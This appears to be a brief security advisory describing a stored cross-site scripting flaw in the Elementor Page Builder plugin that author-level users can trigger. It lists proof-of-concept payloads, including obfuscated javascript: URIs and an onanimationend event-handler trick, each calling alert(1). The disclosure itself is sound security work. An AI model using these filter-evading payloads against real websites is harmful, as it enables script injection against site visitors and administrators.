The Elementor Page Builder plugin is susceptible to stored XSS. An author user can create custom links containing XSS payloads or apply custom attributes to widgets which results in XSS.
javascript:alert(1), JaVaScript:alert(1), javas cript:alert(1)
<style>@keyframes x{}</style><div style="animation-name:x" onanimationend="alert(1)"></div>